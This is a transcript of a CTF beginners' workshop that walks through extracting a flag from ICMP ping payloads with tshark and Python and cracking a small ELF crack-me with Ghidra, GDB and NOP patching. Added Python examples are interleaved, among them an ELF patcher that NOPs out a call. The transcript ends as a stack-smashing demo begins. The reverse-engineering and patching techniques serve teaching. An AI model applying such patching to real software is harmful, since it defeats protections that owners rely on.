Network. Because all CTFs have pcaps, pretty much. So this is a Wireshark challenge. I love Wireshark. Now, Wireshark can be really intimidating.
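Before moving to the network part, here is the "last letter of every word" extraction from the document challenge above written as one reusable function. This is an added example, not the speaker's one-liner: instead of chaining one `.replace()` per punctuation mark it drops everything outside an allow-list, and it treats `\xa0` (a non-breaking space, which is what showed up in the session) as whitespace. The sample text is constructed for the example.

```python
import string

# Characters that may legitimately end a word we care about. Anything else
# (commas, dots, semicolons, quotes, ...) is stripped before splitting.
_KEEP = set(string.ascii_letters + string.digits + "-_{}")


def letters_at(text: str, index: int = -1) -> str:
    """Return the character at `index` of every whitespace-separated word,
    joined into one string. index=-1 is the last letter, 0 the first.

    str.split() with no argument splits on Unicode whitespace, so \xa0
    (non-breaking space) separates words instead of being glued to one.
    """
    cleaned = "".join(ch for ch in text if ch in _KEEP or ch.isspace())
    words = cleaned.split()
    return "".join(w[index] for w in words if len(w) > abs(index) - (index < 0))


def last_letters(text: str) -> str:
    """The variant used in the challenge: last letter of each word."""
    return letters_at(text, -1)


# Constructed sample: each word ends with one character of the hidden
# string, punctuation is sprinkled in, and a non-breaking space sits before
# the dash, as in the real document.
SAMPLE_TEXT = "stufF. camaL; llamA, kinG\xa0- hellO, worlD!"

if __name__ == "__main__":
    print(last_letters(SAMPLE_TEXT))
```

`letters_at` generalises the trick: the same document could hide a flag in first letters, and the CyberChef-style one-off then becomes a one-argument change rather than a rewrite.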
You have access to all the layers of the OSI model here, and it will highlight the bytes that you are interested in. Sometimes what the challenges will do is drown you in data: you have large pcaps, many things to look at, you won't know what to do necessarily. Here I went the minimalistic approach. Again, an approach that by hand could be solvable relatively easily, but we will do a programmatic solution chaining tshark and Python, because why not. Now, anyone has an idea or a suggestion on where you could hide a flag using ping, so using ICMP echo request and echo reply? So, if we look at a regular... let's try to do a capture. Okay, so if I ping Google from my system, this looks like this. So the layers of ping: you have echo, you have a checksum, you have data. Data, interesting. So it seems to be stuff, and then some characters and then 01234567; on Windows it's another one that is very specific, right, it's ABCD or something. So basically it looks like it doesn't matter what is in the data of a ping, and interestingly enough, it is symmetric: the data of the reply and the data of the request is the same. And now I will slide in a little classroom thing that I remember but that is not important for anyone. The reason they were doing this is because before checksumming, there was corruption at the electrical level that would introduce changes in the data, and so by using ping they could detect that kind of problem, because the response wouldn't be exactly the same as the request, and they could detect issues. But because of modern networking, this is now just a legacy something left in there that is just useful to sound smart. Now, let's go back to our pcap and look at the data portion. What we have is something, something, and then capital F, and the reply is the same. What's the next packet? Oh, capital L. What's the reply? Capital L.
What's the next packet? Capital A. Starts to make sense, right? So, if you want to do network data extraction at scale, you can use tshark. You basically give it the attributes of the data you're interested in; by default it's probably not interesting necessarily, let's take a look. Well, it's interesting for an assessment, but not for a CTF player: it has timestamps, IP addresses and stuff like that. Now, you can put it in a mode called fields. Okay, capital T. Yeah, okay. So you can put it in a mode called fields that will tell it to go after the specific fields that you are interested in, which by default I believe is tab separated, so that outputs nicely on the terminal. So I put it in this mode. And now what I want to extract and look at is data. How do I know what's the name of that field on a tshark command line? By using this function here, "Prepare as Filter". So if I do this, it will put me a filter on top, a test, and I can see `data.data == something`, okay. I'm going to give another example just to make it more obvious. It's a little bit small, right. Yeah, okay. Let's say I want to extract automatically the time to live. Okay, how would I do that? You go Prepare as Filter, Selected, and you see `ip.ttl` is the way to extract that. So if we put `ip.ttl` in our tshark, what will happen is that for each packet I will have the `ip.ttl`. Okay, so this is a very useful tip to know what the field names are in the very detailed information that Wireshark provides. Now the one we're interested in is `data.data`, as we found earlier. Let's take a look at that `data.data`. It's cool. I would have expected to have it as a string, so it's kind of disappointing, but Python to the rescue. How did I chain the tshark to the Python? Oh yeah, I remember.
Okay, so another really cool trick with tshark. Oh, you know what, no, I'm going to show you another tool. Because the Python console is cool, but it's not self-documenting. By that I mean that tomorrow you don't remember the Python code you wrote to solve the challenge from the day before. How can you build something that is self-documenting, so that you will remember, or be able to show to your friends, or do a write-up for the CTF? So I'm a big fan of Jupyter notebooks. These are basically Python interpreters built in a web browser. I use that a lot for research. So now I will create a Python kernel. This is one of the little-known features of the Jupyter notebook. So this is basically an IPython notebook, like I can do hello, and then print s. Okay, I run that, I get hello. I could do 23 plus 47 and print that and it will run. Now, one thing that not a lot of people know is that if you prepend with an exclamation mark, it will execute a shell command. But you can also save that output in a variable, which means that here you get a list with the content of the current folder. Okay. So now I save the tshark command from previously. What we're going to have now is a list of packets with the content. The file doesn't exist, of course, because I am in the wrong directory. So now I have a list of the data of the packets. I realize that it's all the same. So what I want is the last byte, but this is hex encoded, so I need to extract the last two characters; two characters is one byte in hex. So yeah, CyberChef could make that clearer, I guess: in CyberChef, 46 "From Hex" means F, right? So we could solve it like that, pasting one at a time. Where is my CyberChef? There. We could copy and paste.
But again, we're going to do it the DEF CON large-scale mode, so we're not going to do that, but many people in CTF would have solved it like that and there's no problem doing so. As long as you got the flag, as long as you have the job done, it's great. But we're going to try to do it in the programmatic fashion. So I have this output list of packets. Now there is a copy, like the second packet I'm not interested in, so I want to drop one out of two from the list. If I had rehearsed I would remember exactly the way to do it cleanly. I don't remember now, so we're going to do the good old fashioned Stack Overflow: "Python list, keep one out of two items". And the answer is complicated, that's not what I want. Keep only one out of two: basically I have two Fs, I want only one F, like keep one out of two. Like only the pairwise... there's something more elegant somewhere. Okay. No, there's a way to do that with slicing, one sec. Okay, I think it's this. That's it. So this will keep one out of every two. It's very easy and fast, no loop required, but it's harder to understand. Okay, so now I have a subset of my problem. Now I want to iterate over each list item and keep just the last two characters. So list comprehensions back to the rescue: c in packets, this will give me one. Now I want to grab the last two. And this gives me what I'm interested in. Now I want to cast this. This is hex. So I think this is one. No, not sure. Yeah. So now I'm close to the solution, so let's just bubble that back. We are dropping one out of every two, because we had the ping and the reply, so we want only one, because the data is exactly the same. So each in that list... list comprehensions are always read outside in: for each in that list, I am keeping the last two characters. This is hex, so I'm turning it into an integer, but hex is base 16, so I need to tell it that it is base 16.
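Here is the whole tshark-to-flag pipeline described in this segment as one self-contained script. This is an added example, not the notebook cell from the talk. It consumes the lines that `tshark -r ping.pcap -Y icmp -T fields -e icmp.type -e data.data` prints (one line per packet, tab separated) and rebuilds the hidden message from the last byte of each payload. Two things are handled that the "drop one out of two" slice does not: it keeps echo requests by ICMP type rather than by position, so a reply missing from the capture or two identical consecutive letters cannot shift the message, and it accepts both hex styles tshark has used over the years (`6162` and `61:62`). The `-e icmp.type` field is added here on top of the `data.data` field used in the session; the sample lines are constructed for the example.

```python
ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def parse_tshark_fields(lines):
    """Parse `tshark -T fields -e icmp.type -e data.data` output into a
    list of (icmp_type, payload_bytes). Older tshark prints the hex with
    ':' separators, newer prints it bare; both are accepted."""
    rows = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        icmp_type, hexdata = line.split("\t", 1)
        rows.append((int(icmp_type), bytes.fromhex(hexdata.replace(":", ""))))
    return rows


def extract_message(lines, where=slice(-1, None)) -> str:
    """Concatenate the bytes selected by `where` (default: last byte) from
    every echo request payload. Replies are ignored instead of being
    dropped by position, so the pairing cannot drift."""
    payloads = [p for t, p in parse_tshark_fields(lines) if t == ICMP_ECHO_REQUEST]
    return b"".join(p[where] for p in payloads).decode("ascii", errors="replace")


def fake_tshark_lines(message: bytes, drop_reply_at: int = -1):
    """Constructed sample output: each request carries seven bytes of
    filler (like the 0x08.. pattern a real ping uses) followed by one
    message byte; the reply echoes the same payload. One reply is left
    out on purpose to show that the positional [::2] trick would break."""
    lines = []
    for i, b in enumerate(message):
        payload = bytes(range(0x08, 0x0F)) + bytes([b])
        lines.append(f"{ICMP_ECHO_REQUEST}\t{payload.hex()}")              # new style
        if i != drop_reply_at:
            lines.append(f"{ICMP_ECHO_REPLY}\t" + ":".join(f"{x:02x}" for x in payload))  # old style
    return lines


SAMPLE_LINES = fake_tshark_lines(b"FLAG-LL", drop_reply_at=2)

if __name__ == "__main__":
    print(extract_message(SAMPLE_LINES))
```

Inside a notebook the `lines` argument is exactly what the `!tshark ...` cell captures into a variable, so the two-liner from the talk and this function consume the same input; the difference is only that the type filter makes the result independent of how many replies made it into the pcap.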
Now I have an integer, and I'm turning that integer into a character. This is a list comprehension, so it will create a list. And I use the trick I used before: I join on an empty string, and I get "flag network forensics expert". And when you think about it, so we're going to make the point before the server crashes, that would be about its time to crash. Now what is interesting here is look at how tight this is, right? Basically a two-liner to the flag. It's crazy when you think about all the powerful expressions that you can combine in a notebook that will have your solution saved for you, self-documenting. So pick up the flag. Here we go. All right. So I hope I convinced you to use the notebook. Whoops, what's that, migration plan? I hope I convinced you; I think it's a great tool to use for research, for CTF, and then even for work, like you can program your work, replace yourself by a script.

Okay, so reverse engineering. It's a crack-me, "simple and safe to execute crack-me". Why the asterisk? Because you need to be careful with executables that are provided to you. So don't run them on your machine, or use a VM for that, because you don't know who built it and it could be evil, you know. It's like, at NorthSec we don't do that, but we've done ransomware, like fake ransomware, before, and you don't know. I think that the challenge designer never intends harm, but harm could be collateral damage. So the advice is always to use a VM and not run it on your own computer. I've seen, at an open CTF at DEF CON in Vegas, challenge designers put like "destroy your home directory" in flags because they were like, huh, that's cool. But this was 10 years ago; it's probably not out of fashion by today's standards, and you still have stuff like that on Stack Overflow or Reddit, obfuscated commands that will destroy your machine.
So you have to be careful, and in CTFs they like to mess with people. So I would be careful here. I'm going to run it on my machine just because I'm too lazy, and I built it: I created the source code, I compiled it myself. So this is why I say you'll have to trust me on that. So we're going to take a look at the easy one. I always either start static or dynamic. I think I want to start static with you guys. So static file analysis is: you are looking at it without executing it. You're not opening it, there's no chance of infection unless it breaks the software you're using to analyze it, which is very, very rare; I've never seen that before. Whereas dynamic analysis is: you execute it, oftentimes with a debugger, and you look at the state and you try to figure out what's going on. It's difficult to design a good crack-me, because when you think about it, this is an executable that has the flag in it. So it means that the job of the designer is to make it hard for you to get to that flag, but not too hard. So let's take a look at this one, given that context. We're going to use the Ghidra tool to do that. IDA Pro is too expensive for my taste, and so when Ghidra came out I gradually stopped using IDA Pro. You can, because it's free and open source, do static analysis outside the VM; for dynamic, we're not going to execute it, but now Ghidra has a debugger so you can execute it. So I would advise Ghidra inside the VM, makes sense. So I'm going to use a non-shared project because it's simpler. Where was my... up here we go, crack-me. And then I wanted to find Godbolt, to go to Godbolt. So it's on the God... I don't know about that one. And these online tools are really cool for CTF, because you don't care about the content of the file, it's not like your company information.
But be careful with company files on services like that, because you're not paying and you're sending them binaries, so if it's your product I wouldn't use something like that. Let's try that, it will probably solve the challenge just like that, right? Yeah. So I'm not going to use that for now, I'll put that aside. And Ghidra: every year I do the same crack-me, and every year Ghidra is getting closer and closer to having it solved just by looking at it. It might be the year that it will do it entirely. So Ghidra's UI is a bit confusing: we created a project but there's nothing there, you need to import. Basically the first step is import, everything starts with importing files; it's kind of the opposite way of IDA. And crack-me: we're importing it, it detected that it's an ELF executable, and then the dragon to chew on it. Yes, analyze it please; there's a lot of options, just analyze. Now it's finished, so it's a relatively small binary. And now we can take a look at what happened. So executables have things that are exported by default. And when you want to analyze the binary, basically you need to start somewhere, right? A hello world in C compiled on Linux gets compiled down to, I think, a 16k or 4k executable; what the C library and compiler add is huge. And so even though `_start` looks like the start of your code, it's actually a libc wrapper that does whatever, it's not interesting. So you need to find what is your real entry point. And so you have a `__libc_start_main` here and a `main` symbol here, so let's double-click on that. Oh, now we're at something interesting. So we have a main that has variables, a printf "performing intense computation", a function called dramatic. Good. Then there's a compute, it prints the beginning of a flag, it raises.
And then there's a loop doing a calculation and a putchar(10); 10, 0x0a in hex, is backslash n, so basically this is just a newline. So we have here something that prints a flag. So if we can have access to the lVar1 variable, we probably would have the flag. Now what is that raise call, right? It's weird. And since lVar1 is returned by compute, maybe we can know what's going on here. So what we have is stack variables, so local variables, and long things that look a lot like printable characters but that disappointingly don't show as printable characters. So it's not... I'll still be doing that demo, clearly they're not figuring out stack strings. It's okay, it makes my challenge last longer, a better lifespan. But so at this point someone smart or experienced will be like: oh, if I skip that raise, I will have the flag, because this is raising a signal, and a signal can be caught or ignored by the operating system. So let's try running the binary and see how far we can get. So I'm using a hybrid approach now; first time I'm doing that. So to execute a file that you downloaded on Linux you need to make it executable, it's not executable by default. So I'm adding the execute right. So this is shown here. Now if I run the crack-me, I have "performing intense computation", and then "flag" and then segmentation fault. So this is clearly the signal. I'm going to wrap around and start it with GDB, the GNU debugger, the default Linux debugger. And I have a GDB plugin. I strongly advise people, if they're serious about doing exploits or crack-mes, to use a GDB plugin. GDB by default is built for people who have source code, not built for reverse engineering or exploitation. So a plugin will really help; vanilla GDB doesn't show you assembly, doesn't show you the stack, doesn't show you anything, so it's just not helpful.
So I use pwndbg. I'm surprised that it still works, I'm not doing that often. And so I launched the program, but by default, since it could be malware, it will not run it. So I need to run it. And then I have my "performing intense computation". And what I see here is the state, this is what's not shown by default. So I have "program received signal". So this tripped the debugger, so I still have control of the program. And it shows me the state of the registers, the disassembly of where I am; I am at this position in the executable, and this is inside libc I believe, and I have the state of the stack. So we see that there is a string that we haven't seen before that is on the stack. And then there's the backtrace, so these are the calls: `__libc_start_main` called something, called main, called raise, and then I'm here, in raise. Now, we can ignore a signal. The way to ignore a signal is by pressing continue. And we have the rest of the flag. So that's a crack-me worth one point. So this is the easiest way to solve that challenge. You could also write the instruction pointer to try to skip the problematic code. Am I going to try that? Are you good with GDB? I need to specify content to a register, I haven't done this in a year. I'll try. So run. Jump somewhere. I mean, this is interesting for a 101 because it puts you in the state of mind of how the machine works, and it gets you close to the metal and understanding how things happen. So, why are we executing stuff? It's because an instruction pointer is incremented. So the instruction pointer is incremented by the computer and it will fetch the next instruction. What's the question? Set that register. That's good. I'm going to Google it, but I'm going to do the theory first. So RIP is the instruction pointer. So this is somewhere in the CPU that has this address, and this address is the code that is being executed. And so what we want to do...
Oh, I went too far. What we want to do is basically put... Oh, I'm going to shoot down raise. So: break main, run. And now you can run instruction by instruction. So now I break, I breakpoint into the main, so I'm in the main function, but we know that there's a lot of stuff that will happen before, and you can always say, I'm going to run this code up to a specific point that I don't see yet. So we could break on... We can do that, and then run up to that point. Next. So by using next you step over the call, instead of stepping into the call. And when you press enter you basically reissue the last command, so I'm going to try to step over the call. So the compute is a long function, so it took the time to execute and output the dots. Not compute, sorry, the dramatic. Compute should be fast. And the raise is here, so we're going to break on it, because it's an address; continue. Okay, so now we have the spot that we want to bypass. So what I'm going to do: the instruction pointer, you can see, is exactly at this point. Now what I want to do is set RIP to be the next thing, so it will never execute; when we say continue we will never have the stack trace. You'd use the jump command to set it and continue. Okay. Can I do that? By the way, so he's saying jump to main plus an offset: you can put the address, but you can put a cute way that will be more easily rememberable. But you'll see when I start looking at the hard variant why this is not something you can always afford to do. But it will be resolved symbolically like that; I need to see things. All right, so we jump at that, so we skip the signal and we got the print. Now, it exited normally, so we skipped what was causing it to crash.
So again, many ways. We can also patch it: the call to raise takes, I don't know, a couple of bytes. We can replace these bytes by 0x90, NOP. Not 0x80, 0x90. And then when it executes this... or we should actually skip these two, because this is preparing the call. So we should override these two by 0x90. And this will just slide, so it will call... and then this will not exist anymore, and then it will move and jump and whatever. So there are many ways to approach a problem like that.

Now, if we want to do it statically from Ghidra, we need to figure out what's going on here. Here we see that there is a SHA-1 call. So basically this long-ass string, which may be backwards, could work. No, it's confusing. So this is basically a string that is being fed to a SHA-1 hash, and so the flag is actually the SHA-1 of something. We cannot get to that something here. Maybe we could do it dynamically in GDB: we could stop at the right place where that string is assembled and figure out what it is. So we can run, break on compute, continue. Are we on compute? Not necessarily. No. Next as a continue. Where are we? Compute. All right. So. Next. Okay, I skipped the first part. Okay, so here. So the last instruction, this instruction here, puts that hex in the CPU, in the register, and you can see that this is "there is". So if I want to take a slow approach, I could start writing down the various contents of that and putting it somewhere. I'm going to do a new notebook. So "there is". And then continue. Where is it? RDX. So the RDX is here. So "no way", with spaces, "no way". Oh, it's here. "There is no way." "You are." "There is no way you are ever go..." "He." So it got combined, or it figures that this is just a long string. What does it look like? Okay, now it's going to add it. "There is no way. You are ever going to find. Figure." We'll maybe lose it, we'll write it down. With the... I just put this. This. Whoops.
Yeah. So. But before we do anything with the stack, this will happen after the strlen for sure. So we can do a next again. And now I think we have completed the string. So again, the string is added, pushed to the stack. So the stack is shown here. And what we're doing here is that we're saying, show me the content of memory as a string: `/s` means as a string, at `$rsp`, which is the value pointed to by the RSP register, that is this address plus 0x10. So how did I find the plus 0x10? It's here, this here is 0x10. So by doing so, now we have "there is no way you are ever going to figure this out". Okay, I have that string. And now that we have the string, which was the hard part: we know it's doing a strlen, allocating some memory, doing the SHA-1 of the string, and then returning. So what we're going to do is md5sum or sha1sum, so I'm going to do echo this, piped into sha1sum. I could do it in Python but it's going to be longer. So we're going to do that instead and self-document my solution, maybe lacking a couple of words here and there. And now we're going to try submitting this with the flag prefix beforehand. And it's incorrect. So, echo does add a newline at the end of the string; I should have remembered that. And because of the nature of hashing, this will generate a very different hash. I would like to verify it, but I just forgot. The strength of a cryptographic hash is that it's entirely different based on a little variation of the input. So this is what happened: echo was adding a newline, and this code wasn't. And by removing it we get a completely different hash. I'm going to try it, if that's our solution. And we got the flag. Now, let's put it in the decompiler. Can I show just this one? Okay.
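The `echo` newline mistake above is worth seeing in numbers. This is an added example, not code from the talk: it hashes the string read off the stack both with and without a trailing newline, counts how many of the 160 digest bits differ, and builds the two candidate flags. The string is the one recovered in the session; the `FLAG-` prefix is an assumption for the demo. On the shell side the equivalent fix is `printf '%s' "$s" | sha1sum` or `echo -n`.

```python
import hashlib

SECRET = "there is no way you are ever going to figure this out"  # read off the stack above


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def hamming_bits(hex_a: str, hex_b: str) -> int:
    """Number of differing bits between two equal-length hex digests."""
    if len(hex_a) != len(hex_b):
        raise ValueError("digests must be the same length")
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def flag_candidates(secret: str, prefix: str = "FLAG-") -> dict:
    """Both hashes a solver might produce: the binary's input as-is, and the
    same input with the newline `echo` appends. Only the first is correct for
    code that hashes strlen(s) bytes. The prefix is an assumed flag format."""
    return {
        "without_newline": prefix + sha1_hex(secret.encode()),
        "with_newline": prefix + sha1_hex((secret + "\n").encode()),
    }


if __name__ == "__main__":
    c = flag_candidates(SECRET)
    print(c["without_newline"])
    print(c["with_newline"])
    print("differing bits:", hamming_bits(c["without_newline"][5:], c["with_newline"][5:]), "of 160")
```

A one-byte change in the input flips roughly half of the digest bits (around 80 of 160), which is why there is no way to eyeball that two submissions are "almost" the same flag: the only reliable check is to hash exactly the bytes the program hashes.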
The compute function is just code. No, no, no. That's right. Now... That's right. I have it installed, I've never used it. I saw someone at an event; I actually know one of the guys who worked on that. Well, it will... No minute to online the web page. So, okay, that's a very powerful thing that I will remember for sure.

And so now, one thing. So this, unfortunately, no matter how hard it looked, this was the easy mode, because the binary was not stripped. So all of the strings like main and compute and everything that was the name of a function is there, because it helps the debugger understand the binary program. And production binaries are most often stripped, because it makes the binary smaller. Then we'll take a look at what it looks like; it's a different beast. I need to download it first. So the difference is, if we look at the exports, they are very different than earlier, right: we have two functions that were identified, stdout, which apparently is an export, not sure why. The functions are all unnamed functions, but the disassembly or decompiling tools are built for that, for you to rename. So now I'm going to try to find the main. Not sure. Okay, so this is the main, right: `__libc_start_main`. And this is still a named function because it's part of libc, and the tool knows that because of the way the ELF is structured and loaded. Now this here is our real main.
And so the practice of reverse engineering is basically taking this, saying rename function, writing main, and you can have your own naming convention, like when you're unsure you prefix with underscore or Z or "maybe" or whatever, and you try to go as fast as you can to confirm if it's clean or not. But now look at this here: the printf is part of the library API, so it's there, clean, but our dramatic, our compute, everything has been hidden away. So if we look at this, it's still doing the same SHA-1 thing, but now there are no names that can be used to figure it out. And when statically you give it names and you move around, it's not too bad, because it will remember the names that you've given to stuff, but then when you switch to your debugger, things are a little bit harder; I need to make it executable. Things are a little bit harder because you cannot do break main, you don't have a main. So you need to figure out where the entry point is. This is, remember, GDB finding the entry point: `info file`. So now you have "entry point" there. So then I think the entry point will always be, if I run, I will be in the entry point. No, it ran. So it ran up to the crash in this case. So if it were malware, this would have been a mistake. Let's try again and do a breakpoint on... whoops. There are no symbols, so I can't use main anymore, but I can use the entry point. So `info file` gives this, but this is why I like... whoops. No. So this is why I like pwndbg or other modules like that: I would break on the address, and then I would run until the address, and then I would have something to move around and work from. But this is not our main yet. And it's still unclear. And I think this is kernel address space, but don't quote me on that. I would next. Whoops. Step, step instruction, continue. I don't know what I'm doing. I will try to, I guess, break elsewhere.
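Two things from this part, finding the entry point of a stripped binary and NOP-patching the call to raise, can both be done from the file without a debugger. The script below is an added example, not code from the talk: a minimal ELF64 reader that returns the entry point (the value `info file` prints), reports whether the binary is stripped (no `SHT_SYMTAB` section, which is what `strip` removes), maps a virtual address to a file offset through the `PT_LOAD` program headers, and overwrites a 5-byte `call rel32` at that address with `0x90`, optionally together with the argument-setup instruction in front of it as suggested above. Header offsets follow the ELF64 layout; little-endian x86-64 is assumed. The image built by `build_sample_elf()` is constructed for the example (one loadable segment, no section table, a `mov edi, 0xb; call; ret` body) and does not claim to match the workshop's crack-me.

```python
import struct

PT_LOAD = 1
SHT_SYMTAB = 2
X86_CALL_REL32 = 0xE8
X86_NOP = 0x90


def _check_elf64(data: bytes) -> None:
    # e_ident: magic, then EI_CLASS (2 = 64-bit), EI_DATA (1 = little-endian)
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")


def entry_point(data: bytes) -> int:
    """e_entry, at offset 0x18 of the ELF64 header."""
    _check_elf64(data)
    return struct.unpack_from("<Q", data, 0x18)[0]


def program_headers(data: bytes):
    """Yield (p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align)."""
    _check_elf64(data)
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    for i in range(e_phnum):
        yield struct.unpack_from("<IIQQQQQQ", data, e_phoff + i * e_phentsize)


def is_stripped(data: bytes) -> bool:
    """True when there is no SHT_SYMTAB section (the table `strip` deletes)."""
    _check_elf64(data)
    e_shoff = struct.unpack_from("<Q", data, 0x28)[0]
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3A)
    if e_shoff == 0 or e_shnum == 0:
        return True
    for i in range(e_shnum):
        sh_type = struct.unpack_from("<I", data, e_shoff + i * e_shentsize + 4)[0]
        if sh_type == SHT_SYMTAB:
            return False
    return True


def vaddr_to_offset(data: bytes, vaddr: int) -> int:
    """Map a virtual address to its file offset via the PT_LOAD segment that backs it."""
    for p_type, _flags, p_offset, p_vaddr, _pa, p_filesz, _memsz, _align in program_headers(data):
        if p_type == PT_LOAD and p_vaddr <= vaddr < p_vaddr + p_filesz:
            return p_offset + (vaddr - p_vaddr)
    raise ValueError(f"0x{vaddr:x} is not backed by file data")


def nop_call(data: bytes, call_vaddr: int, extra_prefix: int = 0) -> bytes:
    """Return a copy with the 5-byte `call rel32` at call_vaddr replaced by NOPs.
    `extra_prefix` extra bytes before the call (the mov that loads the signal
    number, for instance) are NOPed too. Refuses to patch anything that is
    not an E8 opcode, so a wrong address cannot silently corrupt the file."""
    off = vaddr_to_offset(data, call_vaddr)
    if data[off] != X86_CALL_REL32:
        raise ValueError(f"byte at 0x{call_vaddr:x} is 0x{data[off]:02x}, not a call rel32")
    patched = bytearray(data)
    patched[off - extra_prefix:off + 5] = bytes([X86_NOP]) * (5 + extra_prefix)
    return bytes(patched)


def build_sample_elf() -> bytes:
    """Constructed test image: 64-byte header, one PT_LOAD phdr, then
    `mov edi, 0xb` (bf 0b 00 00 00), `call +0` (e8 00 00 00 00), `ret` (c3)
    at file offset 0x78, loaded at 0x400000. No section headers."""
    code = bytes.fromhex("bf0b000000") + bytes.fromhex("e800000000") + b"\xc3"
    phoff, base = 64, 0x400000
    code_off = phoff + 56
    hdr = bytearray(64)
    hdr[:4] = b"\x7fELF"
    hdr[4], hdr[5], hdr[6] = 2, 1, 1  # ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    struct.pack_into("<HHIQQQIHHHHHH", hdr, 16,
                     2, 0x3E, 1, base + code_off, phoff, 0, 0, 64, 56, 1, 64, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_LOAD, 5, 0, base, base,
                       code_off + len(code), code_off + len(code), 0x1000)
    return bytes(hdr) + phdr + code


if __name__ == "__main__":
    elf = build_sample_elf()
    print(f"entry 0x{entry_point(elf):x}, stripped={is_stripped(elf)}")
    patched = nop_call(elf, entry_point(elf) + 5, extra_prefix=5)
    print(patched[0x78:0x83].hex())
```

On a real crack-me the address of the `call raise` comes from Ghidra's listing, and `vaddr_to_offset` is what turns it into something you can write to the file; a debugger `jump` or `set $rip` bypasses the same instruction in memory only, which is why a patched copy is the thing to keep if you want the bypass to survive the session.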
The previous way to solve it still works no matter whether debugging symbols exist or not. And this was the only difference between the easy and the hard: nothing in the code is different. It's just that I stripped the symbols from the binary, which by definition makes it harder. Most reverse engineering, crackme or pwn challenges will be built like that, to make it harder for you. But then, as you walk around, you still have some strings to help you figure out what's happening. And there are tools, I believe, that synchronize whatever you do in Ghidra so you will have it in GDB. Same with IDA. So if you rename a function there, you will have it in GDB. These are complicated to set up. So basically, people working a lot on reverse engineering, crackmes or exploitation challenges should spend time oiling their toolchain to make sure that stuff like this is workable and possible. And there are a lot of good tutorials online, and pwndbg, this specific GDB plugin, does have a bridge for IDA that should help you be faster at doing this.

By the way, for the binary: yeah, x64dbg. Yeah, people used OllyDbg a lot before, but x64dbg, for six years now, has been a solid alternative. But sometimes there's something about Olly, like for packers, for example, that Olly just never breaks. But I think x64dbg is really reliable and used by the industry more and more. There's also WinDbg; it's harder to use. It's kind of like GDB, but it is the one provided by Microsoft to debug their own stuff, including kernel code. But it's a lot less user-friendly than x64dbg. So again, you know, make sure you try both. And I know these references might be hard to remember, but I'm going to make a deal with you here, everyone still here or on the stream: if you come and see me during the CTF, I will be there the whole weekend.
And you're like, "Hey, what's the name of the tool?" I will happily give it to you again. This is not cheating. This is just, like I told you, that I didn't have slides, so you don't have takeaways except three hours of me ranting. So I'll happily give it back, and give the good one. Give me the context of what you're trying to do and I'll give you the pointers to the tools. And you can do that with the guys here as well; this will not be considered cheating. We're on YouTube. So for the weekend we might have a YouTube recording, but it will be raw and unedited. You'd have to go through it and find the parts you're interested in.

That's it for me, or is it? How long? How many? 36 minutes. I don't think I want to get into the exploitation. Do you want me to do the exploitation? It's a bonus. Okay, I'll do it. Yeah, no extensive explanation, because this is like medieval-level OSCP from 10 years ago. The exploit is stack smashing; it's not modern at all, because since then a lot has changed to prevent bugs like this, in compilers, in CPUs and all that. This is kind of as fake as it can be. But let's try, let's look at it. I have 36 minutes and I'm rusty.

Okay, exploit. So most exploitation challenges start with a service. It's usually text-based because it's very minimalistic. And the goal is just to write to memory and then have the computer go into that memory and execute what's in it. So here we have a serial number checker. We're going to do a test. "Sorry, wrong serial number." Then we're going to do a classic. And then I'm not getting a "wrong serial number"; I crashed it. So there's something broken here. I need to figure out what it is. We get the service again, and this is because we run it in a mode where it will restart on the next connection. So then you can hunt for the right length where you crash it. So you see, between these two lengths, I'm crashing it.
Now the source code is provided, and the instructions to compile it as well. Well, let's download the source code. So we have a compute function. We have a validate function. There is a session: "enter your serial number", we receive from the network, there's a success and then a confirmation number, or "wrong serial number". It runs on 12345, "server's ready", and it's forking. So this here, okay, it says what it runs on. This is important to have reliable addressing. This is one reason why Linux is harder to exploit than Windows: when you do exploitation, you need to have a great understanding of the state of the memory. And on Windows, since it's all pre-compiled and the same thing, every Windows version is like the same, whereas on Linux you need the exact one, because there's a new version every six months or so. So this information is kind of valuable if you want to exploit it quickly.

Now, in order to do local testing, we will need to be able to compile it, so create a fake service file. Do I run? Is there still a Docker for that? I'm wondering if it doesn't take me as a Vagrant, because it seems I didn't succeed. What do you think? I'm going to have access to the local file. Just what? Just a dot? Just what, host? Just the colon? Colon. And then, go down. Oops. No, but I don't stop my Docker by default. I don't stop my Docker all the time. And sometimes, once I got my hands on the computer, I was running WordPress on the internet, and I was like, oh, excuse me for people on the stream. "Unable to find..." Oh, it's still there. I thought that they... Because if you look here, they don't list 14.04 anymore. That's why I thought they could have. They don't list the old images. Well, I need a compiler. So we're spinning up the exact version of that operating system. We are installing stuff to compile. Good memory. Then they're probably pointing to a slow archive that still works.
Okay, so we're installing stuff to be able to compile. Then our instructions. So we need to put this in services.h, otherwise it won't compile here. So this is outside the Docker image. Oh. And this is inside the Docker image. Then compile without... So we need to put no stack protector, because the compiler has that protection built in now. This is why I was saying it's a very old technique, to show how to smash the stack. And I'm missing stuff. A kernel image or... Oh, okay. No, but this is... 32-bit. Oh, well, Docker. Yeah, it's going to take the same architecture. Good point, good point. I'm glad I have helpers, because sometimes you lose hours on stuff like this. Okay, I have service. Can I run it? I'm going to map it and then it runs. Because if... Oh, but what? Since it's the same binary... Oh, my hostname has changed. Okay, so again, now we're giving it network access. And now, do I have this? I'm going to install that as well, a terminal multiplexer. If I want to debug it, it's going to be useful. So service... This is usually when you have a 32-bit to 64-bit problem. What? You think I lost it? Yeah, yeah, I understand, but I'm a bit traumatized. It said if I close the container, I'm out of it. Shit. Yeah. Yeah, but now it's... Okay, I hope I don't have to recompile. No, no, no, it's apt update. I told you I didn't want to do this, by the way. So you're here, you're here. You're stuck when you... apt, apt, well, we can look at the source code in the meantime.

